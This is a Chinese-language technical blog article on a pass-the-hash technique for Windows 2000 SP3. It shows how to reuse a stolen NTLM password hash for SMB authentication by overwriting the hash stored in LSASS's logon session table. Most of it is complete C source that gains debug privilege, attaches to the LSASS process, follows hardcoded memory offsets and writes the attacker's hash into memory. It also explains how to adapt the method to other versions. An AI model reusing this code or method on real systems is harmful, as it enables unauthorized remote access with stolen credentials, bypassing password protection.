在很多时候,我们获得密码散列之后你会怎么办?大多数的人会选择使用如LC4这样的工具进行散列的解密,这样就是依靠对方口令的复杂性不够复杂,如果遇见复杂的口令,又如何利用散列呢? 通过SMB认证协议我们知道,认证是散列加密的,所以知道散列是能够获得认证的,但是麻烦在于系统本身提供的SMB调用很少,要实现散列认证就不仅仅需要知道散列加密的认证算法,而且要自己完全实现SMB协议和其包含的RPC协议(以我目前的研究我也还只能实现文件读写操作),这很困难,如果需要用到所有的可能SMB的功能就需要很大的工作量。SMBPROXY就是通过SMB协议中的散列加密方式和代理来实现的。有没有其他更好,更简单的途径呢?答案是有的: 那么另2种想法就是: 1。创建一个使用此散列的同名用户,但你不知道其散列无法使用口令登陆。当然如果你能以超级用户用RUNAS等启动这个用户权限运行的进 程 ,然后使用AcquireCredentialsHandleW传送此用户的令牌,也可以,但是显然MS考虑到这个问题,即使用特权用户用RUNAS或服务启动其他 用户权限的进程都必须首先输入明文口令才允许运行。 2。制造一个假的带知道自己散列的凭证 那么我们首先介绍一下NET USE成功以后创建凭证和再次认证的过程: 对于输入口令,则通过调用LPCAPILOG将这个认证记录,包含主机地址,用户名,和明文口令,当再次认证(SMB是基于SOCKET口认证的,当需要一个新的SOCKET连接的时候都会重认证,只是这过程是系统自动完成的,你自己感觉不到而已,这也是SMB协议认证工具必须使用依靠自己解析完整的 SMB的原因所在,无法创建凭证其他程序就无法使用已经认证的端口)就从这当中读取明文口令再计算成散列,进行认证,要制造一个假的凭证看来我们就必须知道明文口令。 在MS的严密设计下,看来我们无路可走了,但是我们再考虑一下系统用户认证的方式呢? 系统用户认证的时候,是直接读取散列进行加密处理的,具体的处理程序是在LSASS进程中LsapGetPackageCredentials函数负责。 那么一个想法是修改自己用户的SAM中的散列,但是发现口令散列的修改只到下一次登陆后才能起作用,可见系统在登陆以后就把散列信息都读出到内存中。 但是联想到我们系统连接一个远程机器的时候,会自动先使用这个用户的散列连接,这个散列从那里而来呢,他就在LSASS进程中的一个SESSION表中,那么我们想法修改内存中放置系统用户的SESSION表又如何呢?呵呵,这样就能实现我们既可以完全利用密码散列的系统所有功能了。 方法如下: 创建一个和你知道散列用户同名的用户,设置成特权用户,口令随便 以该用户登陆,运行一个程序修改系统内存中的SESSION表对应用户的散列 然后就可以直接使用远程IP地址和这个用户连接了,如直接输入IP地址到地址栏读取对方文件等。 那么首先需要讲解一下LSASS中SESSION表的存放结构,我的环境是中文简体W2K+SP3 在LSASS进程地址的0X785AFEF8变量中存放LogonSessionTable的地址 这个地址是指向一张SESSION表,每个表占用0X34个字节, 每个项的偏移0X10是一个指针,指向一个结构,这个结构的偏移0X10又是一个指针,指向另一个结构,这个结构的偏移0X38又是一个指针,指向又一个结构(很拗口啊),这个结构的偏移0X8又是一个指针,指向另一个结构,这个结构的偏移0X10又是一个指针,指向真正的用户凭证的SESSION信息,这个信息结构如下: { WORD 主机名长度 WORD 主机名长度(带,STR结尾) DWORD 主机名开始偏移 WORD 用户名长度 WORD 用户名长度(带,STR结尾) DWORD 用户名开始偏移 BYTE 散列[0X20] 偏移地址开始 WSTR 主机名 WSTR 用户名 } 我们修改这个结构中的散列成我们获取的散列,系统SMB认证的时候就会读取这个散列的信息,剩下就。。。。。 代码演示: # include <windows.h> # include <wincrypt.h> #define SECURITY_WIN32 # include <Security.h> # include <Ntsecapi.h> #include <stdio.h> #include <stdlib.h> TOKEN_STATISTICS ts; CredHandle phc; CtxtHandle cthc; SECURITY_STATUS ss; void client1(); void ChangePrivilege(HANDLE pmy,char * PrivilegeVal) { int isok; TOKEN_PRIVILEGES NewState; HANDLE hToken; NewState.PrivilegeCount=1; NewState.Privileges[0].Attributes=2; NewState.Privileges[0].Luid.HighPart=0; NewState.Privileges[0].Luid.LowPart=0; isok=LookupPrivilegeValue(0,PrivilegeVal,&NewState.Privileges[0].Luid); isok=OpenProcessToken(pmy,0x20,&hToken); isok=AdjustTokenPrivileges(hToken,0,&NewState,0x10,0,0); CloseHandle(hToken); } void main(int argc,char * argv[]) { DWORD ret; HANDLE pmy; HANDLE p1; DWORD wtn; int err; DWORD saddr,saddr1; int offset; int i,j,len; unsigned char buf[0x1000]; unsigned char buf1[0x100]; unsigned char passwdhash[]={ 0xf9,0x8d,0x8e,0x5e,0x22,0xf9,0xe2,0x5e,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xEe, 0x12,0x22,0x73,0x58,0xdd,0x70,0x13,0xc7,0xdb,0xdb,0xd8,0xfd,0xcc,0x0c,0x66,0x68 }; //wchar_t username[]=L"Administrator"; wchar_t myname[]=L"Administrator"; //int tlen=0x1A; int ulen=0x1a; client1(); pmy = GetCurrentProcess(); ChangePrivilege(pmy,SE_DEBUG_NAME); p1=OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_READ|PROCESS_VM_WRITE,FALSE,252); ret = DebugActiveProcess(252); if(ret==0) { ret = GetLastError; printf("don't access process:%d/n",ret); return; } ret = ReadProcessMemory(p1,(PVOID)0X785AFEF8,buf,0x4,&wtn); if(ret==0xc0000005) { printf("read memory fail/n"); return; } saddr=*(DWORD *)buf;//这里存放的就是所有SESSION的地址 //寻找自己的SESSION信息 ret = ReadProcessMemory(p1,(PVOID)saddr,buf,0x1000,&wtn); for(i=0;i<0x4e;i++) //每个SESSION结构占0X34大小,0X1000可以有0X4E个 { saddr1=*(DWORD *)(buf+0x34*i+0x10); if(saddr1>0) { ret = ReadProcessMemory(p1,(PVOID)saddr1,buf1,0x14,&wtn); if(ret!=0xc0000005) { saddr1=*(DWORD *)(buf1+0x10); if(saddr1>0) { ret = ReadProcessMemory(p1,(PVOID)saddr1,buf1,0x40,&wtn); if(ret!=0xc0000005) { saddr1=*(DWORD *)(buf1+0x38); if(saddr1>0) { ret = ReadProcessMemory(p1,(PVOID)saddr1,buf1,0xc,&wtn); if(ret!=0xc0000005) { saddr1=*(DWORD *)(buf1+0x8); if(saddr1>0) { ret = ReadProcessMemory(p1,(PVOID)saddr1,buf1,0x14,&wtn); if(ret!=0xc0000005) { saddr1=*(DWORD *)(buf1+0x10); if(saddr1>0) //这个地址才是真的散列存放的地址 { ret = ReadProcessMemory(p1,(PVOID)saddr1,buf1,0x100,&wtn); //验证一下此ID等于自己的ID err=0; if(ret!=0xc0000005) { len=*(short *)(buf1+8); offset=*(short *)(buf1+0xc); if(len==ulen) { /*for(j=0;j<ulen/2;j++) { if(myname[j]!=buf1[offset+2*j]+buf1[offset+2*j+1]*256) { err=1; break; } }*/ if(err==0) { memcpy(buf1+0x10,passwdhash+0x10,0x10); memcpy(buf1+0x20,passwdhash,0x10); //*(short *)(buf1+8)=tlen; //*(short *)(buf1+0xa)=tlen+2; //memcpy(buf1+offset,username,tlen+2); ret = WriteProcessMemory(p1,(PVOID)saddr1,buf1,0x100,&wtn); if(ret==0xc0000005) { printf("write memory fail/n"); } ret = ReadProcessMemory(p1,(PVOID)saddr1,buf1,0x100,&wtn); } break; } } } } } } } } } } } } CloseHandle(p1); // DebugSetProcessKillOnExit(FALSE); // ret = DebugActiveProcessStop(atoi(argv[1])); return; } void client1() { LUID LogonID; HANDLE tk; char buf1[0x200]; TimeStamp Lifetime; DWORD ContextAttributes; DWORD rlen; SecBufferDesc OutBuffDesc; SecBufferDesc InBuffDesc; SecBuffer InSecBuff; SecBuffer OutSecBuff; LogonID.HighPart =0; LogonID.LowPart = 0x7d80; //输入的口令在此需要CRT //自动的则不需要 OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tk); GetTokenInformation(tk,TokenStatistics,&ts,sizeof(ts),&rlen); ss=AcquireCredentialsHandleW (NULL,L"Negotiate",SECPKG_CRED_OUTBOUND,&ts.AuthenticationId,NULL,NULL,NULL,&phc,&Lifetime); //LOGIN会影响生成 InBuffDesc.ulVersion = 0; InBuffDesc.cBuffers = 1; InBuffDesc.pBuffers = &InSecBuff; InSecBuff.BufferType =SECBUFFER_TOKEN; InSecBuff.cbBuffer =0; InSecBuff.pvBuffer = buf1; OutBuffDesc.ulVersion = 0; OutBuffDesc.cBuffers = 1; OutBuffDesc.pBuffers = &OutSecBuff; OutSecBuff.BufferType = SECBUFFER_TOKEN; OutSecBuff.cbBuffer =0x404c; OutSecBuff.pvBuffer = buf1; ss=InitializeSecurityContextW( &phc, NULL, L"HOST/TEST", ASC_REQ_MUTUAL_AUTH|ASC_REQ_DELEGATE|ASC_REQ_STREAM|ASC_REQ_ALLOW_NON_USER_LOGONS,//0x210003 0, SECURITY_NATIVE_DREP, &InBuffDesc, 0, &cthc, &OutBuffDesc, &ContextAttributes, &Lifetime ); } 此种方法的优点: 1。主要是依据系统使用当前用户认证的系统机理而不是靠SMB协议的机理,这样可以完全实现所有的系统功能,如果是SMB协议实现的话 由于SMB的认证是基于SOCKET口的,凭证创建需要明文口令,无法使其他系统程序如带PRC调用的程序使用此认证,只有依靠实现此认证的 程序实现,除非实现一个完全的SMB协议客户端,功能受限制 2。无须各种代理,简单容易实现,也很安全,也不受任何对方关闭认证协议的限制,系统自动完成这些。 通用化的考虑,但是毕竟这个0X785AFEF8可能随系统版本不同而不同,但这些信息是存放在堆中的,可以读取LSASS的内存信息,然后搜索这些内存 中你现在口令的散列方式来实现通用化,就不再详细解说了。
利用系统机理,直接使用密码散列认证
最新推荐文章于 2020-04-07 10:37:56 发布